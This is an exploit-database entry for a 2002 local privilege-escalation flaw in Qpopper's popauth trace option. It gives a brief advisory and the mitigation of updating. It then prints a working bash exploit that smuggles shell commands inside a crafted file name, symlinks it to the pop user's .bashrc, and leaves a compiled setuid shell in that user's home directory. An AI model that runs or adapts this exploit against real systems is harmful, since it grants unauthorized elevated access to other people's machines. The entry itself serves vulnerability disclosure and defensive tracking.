Qpopper popauth Symlink Follow Vulnerability

vendor:

Qpopper

by:

IhaQueR

7.2

CVSS

HIGH

Symlink Follow Vulnerability

N/A

CWE

Product Name: Qpopper

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Qpopper popauth Symlink Follow Vulnerability

When popauth is executed with the trace option, it does not correctly handle user-supplied input. A user can supply data to the popauth program through the trace flag which will cause the program to execute shell commands, and follow symbolic links. This problem could be exploited to gain privilege elevation equal to that of the setuid bit on popauth, typically setuid as the pop user.

Mitigation:

Update to the latest version of Qpopper.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3710/info

Qpopper is a freely available, open source Post Office Protocol server. It is maintained and distributed by Qualcomm.

When popauth is executed with the trace option, it does not correctly handle user-supplied input. A user can supply data to the popauth program through the trace flag which will cause the program to execute shell commands, and follow symbolic links.

This problem could be exploited to gain privilege elevation equal to that of the setuid bit on popauth, typically setuid as the pop user. 

#!/bin/bash

# popauth symlink follow vuln by IhaQueR
# this will create .bashrc for user pop
# and ~pop/sup suid shell

FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include <stdio.h>\nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')

ln -s /var/lib/pop/.bashrc "$FILE"

/usr/sbin/popauth -trace "$FILE"